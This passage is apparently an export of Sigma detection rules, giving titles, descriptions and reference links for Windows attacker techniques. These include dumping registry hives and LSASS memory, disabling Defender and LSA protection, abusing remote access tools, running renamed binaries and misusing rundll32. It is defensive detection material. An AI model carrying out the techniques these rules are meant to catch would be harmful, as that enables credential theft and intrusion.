https://www.attackiq.com/2023/09/20/emulating-rhysida/, https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/, https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html, https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper, https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI |
Direct Autorun Keys Modification |
Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md |
Security Service Disabled Via Reg.EXE |
Detects execution of "reg.exe" to disable security services such as Windows Defender. |
https://twitter.com/JohnLaTwC/status/1415295021041979392, https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1, https://vms.drweb.fr/virus/?i=24144899, https://bidouillesecurity.com/disable-windows-defender-in-powershell/ |
Dumping of Sensitive Hives Via Reg.EXE |
Detects the usage of "reg.exe" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives. |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md, https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets |
Windows Recall Feature Enabled Via Reg.EXE |
Detects the enabling of the Windows Recall feature via registry manipulation.
Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0.
Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.
This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
|
https://learn.microsoft.com/en-us/windows/client-management/manage-recall, https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis |
Potential Suspicious Registry File Imported Via Reg.EXE |
Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility |
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/reg-import |
LSA PPL Protection Disabled Via Reg.EXE |
Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process |
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ |
Modify Group Policy Settings |
Detect malicious GPO modifications can be used to implement many other malicious behaviors. |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md |
Suspicious Reg Add Open Command |
Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
Enumeration for Credentials in Registry |
Adversaries may search the Registry on compromised systems for insecurely stored credentials.
The Windows Registry stores configuration information that can be used by the system or other programs.
Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md |
Enable LM Hash Storage - ProcCreation |
Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
|
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a, https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/prevent-windows-store-lm-hash-password, https://www.sans.org/blog/protecting-privileged-domain-accounts-lm-hashes-the-good-the-bad-and-the-ugly/ |
RestrictedAdminMode Registry Value Tampering - ProcCreation |
Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode.
RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.
This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise
|
https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md, https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Detected Windows Software Discovery |
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md, https://github.com/harleyQu1nn/AggressorScripts |
Potential Tampering With RDP Related Registry Keys Via Reg.EXE |
Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values |
https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ |
Potential Configuration And Service Reconnaissance Via Reg.EXE |
Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md |
Suspicious ScreenSave Change by Reg.exe |
Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md, https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf |
Changing Existing Service ImagePath Value Via Reg.EXE |
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.
Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.
Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe |
Reg Add Suspicious Paths |
Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md, https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Disabled Volume Snapshots |
Detects commands that temporarily turn off Volume Snapshots |
https://twitter.com/0gtweet/status/1354766164166115331 |
Suspicious Windows Defender Registry Key Tampering Via Reg.EXE |
Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection |
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/, https://github.com/swagkarna/Defeat-Defender-V1.2.0, https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 |
Write Protect For Storage Disabled |
Detects applications trying to modify the registry in order to disable any write-protect property for storage devices.
This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.
|
https://www.manageengine.com/products/desktop-central/os-imaging-deployment/media-is-write-protected.html |
Suspicious Query of MachineGUID |
Use of reg to get MachineGuid information |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery |
Remote Access Tool - AnyDesk Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Remote Access Tool - AnyDesk Piped Password Via CLI |
Detects piping the password to an anydesk instance via CMD and the '--set-password' flag. |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - AnyDesk Silent Installation |
Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access. |
https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20, https://support.anydesk.com/Automatic_Deployment |
Remote Access Tool - AnyDesk Execution With Known Revoked Signing Certificate |
Detects the execution of an AnyDesk binary with a version prior to 8.0.8.
Prior to version 8.0.8, the Anydesk application used a signing certificate that got compromised by threat actors.
Use this rule to detect instances of older versions of Anydesk using the compromised certificate
This is recommended in order to avoid attackers leveraging the certificate and signing their binaries to bypass detections.
|
https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/, https://anydesk.com/en/changelog/windows |
Remote Access Tool - Anydesk Execution From Suspicious Folder |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Remote Access Tool - RURAT Execution From Unusual Location |
Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - MeshAgent Command Execution via MeshCentral |
Detects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly.
MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
|
https://github.com/Ylianst/MeshAgent, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-dispatcher.js#L173, https://github.com/Ylianst/MeshAgent/blob/52cf129ca43d64743181fbaf940e0b4ddb542a37/modules/win-info.js#L55 |
Remote Access Tool - NetSupport Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md |
Remote Access Tool - NetSupport Execution From Unusual Location |
Detects execution of client32.exe (NetSupport RAT) from an unusual location (outside of 'C:\Program Files') |
https://redcanary.com/blog/misbehaving-rats/ |
Remote Access Tool - GoToAssist Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows |
Remote Access Tool - LogMeIn Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows |
Remote Access Tool - ScreenConnect Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows |
Remote Access Tool - ScreenConnect Installation Execution |
Detects ScreenConnect program starts that establish a remote access to a system. |
https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies |
Remote Access Tool - ScreenConnect Remote Command Execution |
Detects the execution of a system command via the ScreenConnect RMM service. |
https://github.com/SigmaHQ/sigma/pull/4467 |
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution |
Detects potentially suspicious child processes launched via the ScreenConnect client service.
|
https://www.mandiant.com/resources/telegram-malware-iranian-espionage, https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708, https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html |
Remote Access Tool - ScreenConnect Server Web Shell Execution |
Detects potential web shell execution from the ScreenConnect server process. |
https://blackpointcyber.com/resources/blog/breaking-through-the-screen/, https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8 |
Remote Access Tool - Simple Help Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Remote Access Tool - Team Viewer Session Started On Windows Host |
Detects the command line executed when TeamViewer starts a session started by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Remote Access Tool - UltraViewer Execution |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md |
Discovery of a System Time |
Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. |
https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md |
Renamed AdFind Execution |
Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain. |
https://www.joeware.net/freetools/tools/adfind/, https://thedfirreport.com/2020/05/08/adfind-recon/, https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/, https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx, https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md |
Renamed AutoHotkey.EXE Execution |
Detects execution of a renamed autohotkey.exe binary based on PE metadata fields |
https://www.autohotkey.com/download/, https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/ |
Renamed AutoIt Execution |
Detects the execution of a renamed AutoIt2.exe or AutoIt3.exe.
AutoIt is a scripting language and automation tool for Windows systems. While primarily used for legitimate automation tasks, it can be misused in cyber attacks.
Attackers can leverage AutoIt to create and distribute malware, including keyloggers, spyware, and botnets. A renamed AutoIt executable is particularly suspicious.
|
https://twitter.com/malmoeb/status/1665463817130725378?s=12&t=C0_T_re0wRP_NfKa27Xw9w, https://www.autoitscript.com/site/ |
Potential Defense Evasion Via Binary Rename |
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process |
Potential Defense Evasion Via Rename Of Highly Relevant Binaries |
Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint. |
https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html, https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html, https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks, https://twitter.com/christophetd/status/1164506034720952320, https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ |
Renamed BOINC Client Execution |
Detects the execution of a renamed BOINC binary. |
https://boinc.berkeley.edu/, https://www.virustotal.com/gui/file/91e405e8a527023fb8696624e70498ae83660fe6757cef4871ce9bcc659264d3/details, https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Renamed BrowserCore.EXE Execution |
Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) |
https://twitter.com/mariuszbit/status/1531631015139102720 |
Renamed Cloudflared.EXE Execution |
Detects the execution of a renamed "cloudflared" binary. |
https://github.com/cloudflare/cloudflared/releases, https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/do-more-with-tunnels/trycloudflare/, https://github.com/cloudflare/cloudflared, https://www.intrinsec.com/akira_ransomware/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/ |
Renamed CreateDump Utility Execution |
Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/, https://twitter.com/bopin2020/status/1366400799199272960 |
Renamed CURL.EXE Execution |
Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields |
https://twitter.com/Kostastsale/status/1700965142828290260 |
Renamed ZOHO Dctask64 Execution |
Detects a renamed "dctask64.exe" execution, a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central.
This binary can be abused for DLL injection, arbitrary command and process execution.
|
https://twitter.com/gN3mes1s/status/1222088214581825540, https://twitter.com/gN3mes1s/status/1222095963789111296, https://twitter.com/gN3mes1s/status/1222095371175911424 |
Renamed FTP.EXE Execution |
Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields |
https://lolbas-project.github.io/lolbas/Binaries/Ftp/ |
Renamed Gpg.EXE Execution |
Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. |
https://securelist.com/locked-out/68960/ |
Renamed Jusched.EXE Execution |
Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group |
https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf |
Renamed Mavinject.EXE Execution |
Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md, https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e, https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152, https://github.com/SigmaHQ/sigma/issues/3742, https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection |
Renamed MegaSync Execution |
Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. |
https://redcanary.com/blog/rclone-mega-extortion/ |
Renamed Msdt.EXE Execution |
Detects the execution of a renamed "Msdt.exe" binary |
https://lolbas-project.github.io/lolbas/Binaries/Msdt/ |
Renamed Microsoft Teams Execution |
Detects the execution of a renamed Microsoft Teams binary. |
Internal Research |
Renamed NetSupport RAT Execution |
Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings |
https://redcanary.com/blog/misbehaving-rats/ |
Renamed NirCmd.EXE Execution |
Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. |
https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.nirsoft.net/utils/nircmd.html |
Renamed Office Binary Execution |
Detects the execution of a renamed office binary |
https://infosec.exchange/@sbousseaden/109542254124022664 |
Renamed PAExec Execution |
Detects execution of renamed version of PAExec. Often used by attackers |
https://www.poweradmin.com/paexec/, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf |
Renamed PingCastle Binary Execution |
Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. |
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.pingcastle.com/documentation/scanner/ |
Renamed Plink Execution |
Detects the execution of a renamed version of the Plink binary |
https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/, https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html |
Visual Studio NodejsTools PressAnyKey Renamed Execution |
Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries |
https://twitter.com/mrd0x/status/1463526834918854661, https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 |
Potential Renamed Rundll32 Execution |
Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection |
https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
Renamed Remote Utilities RAT (RURAT) Execution |
Detects execution of renamed Remote Utilities (RURAT) via Product PE header field |
https://redcanary.com/blog/misbehaving-rats/ |
Renamed SysInternals DebugView Execution |
Detects suspicious renamed SysInternals DebugView execution |
https://www.epicturla.com/blog/sysinturla |
Renamed ProcDump Execution |
Detects the execution of a renamed ProcDump executable.
This often done by attackers or malware in order to evade defensive mechanisms.
|
https://learn.microsoft.com/en-us/sysinternals/downloads/procdump |
Renamed PsExec Service Execution |
Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators |
https://learn.microsoft.com/en-us/sysinternals/downloads/psexec, https://www.youtube.com/watch?v=ro2QuZTIMBM |
Renamed Sysinternals Sdelete Execution |
Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) |
https://learn.microsoft.com/en-us/sysinternals/downloads/sdelete, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md |
Renamed Vmnat.exe Execution |
Detects renamed vmnat.exe or portable version that can be used for DLL side-loading |
https://twitter.com/malmoeb/status/1525901219247845376 |
Renamed Whoami Execution |
Detects the execution of whoami that has been renamed to a different name to avoid detection |
https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/, https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ |
Capture Credentials with Rpcping.exe |
Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. |
https://lolbas-project.github.io/lolbas/Binaries/Rpcping/, https://twitter.com/vysecurity/status/974806438316072960, https://twitter.com/vysecurity/status/873181705024266241, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11) |
Ruby Inline Command Execution |
Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Potential Rundll32 Execution With DLL Stored In ADS |
Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). |
https://lolbas-project.github.io/lolbas/Binaries/Rundll32 |
Suspicious Advpack Call Via Rundll32.EXE |
Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function |
https://twitter.com/Hexacorn/status/1224848930795552769, http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ |
Suspicious Rundll32 Invoking Inline VBScript |
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 |
https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ |
Rundll32 InstallScreenSaver Execution |
An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver |
https://lolbas-project.github.io/lolbas/Libraries/Desk/, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl |
Suspicious Key Manager Access |
Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) |
https://twitter.com/NinjaParanoid/status/1516442028963659777 |
Rundll32 Execution Without CommandLine Parameters |
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity |
https://www.cobaltstrike.com/help-opsec, https://twitter.com/ber_m1ng/status/1397948048135778309 |
Mshtml.DLL RunHTMLApplication Suspicious Usage |
Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
|
https://twitter.com/n1nj4sec/status/1421190238081277959, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt, http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt |
Suspicious NTLM Authentication on the Printer Spooler Service |
Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service |
https://twitter.com/med0x2e/status/1520402518685200384, https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml |
Potential Obfuscated Ordinal Call Via Rundll32 |
Detects execution of "rundll32" with potential obfuscated ordinal calls |
Internal Research |
Rundll32 Spawned Via Explorer.EXE |
Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. |
https://redcanary.com/blog/raspberry-robin/, https://thedfirreport.com/2022/09/26/bumblebee-round-two/ |
Process Memory Dump Via Comsvcs.DLL |
Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) |
https://twitter.com/shantanukhande/status/1229348874298388484, https://twitter.com/pythonresponder/status/1385064506049630211?s=21, https://twitter.com/Hexacorn/status/1224848930795552769, https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/, https://twitter.com/SBousseaden/status/1167417096374050817, https://twitter.com/Wietze/status/1542107456507203586, https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py |
Rundll32 Registered COM Objects |
load malicious registered COM objects |
https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md |
Suspicious Process Start Locations |
Detects suspicious process run from unusual locations |
https://car.mitre.org/wiki/CAR-2013-05-002 |
Suspicious Rundll32 Setupapi.dll Activity |
setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file. |
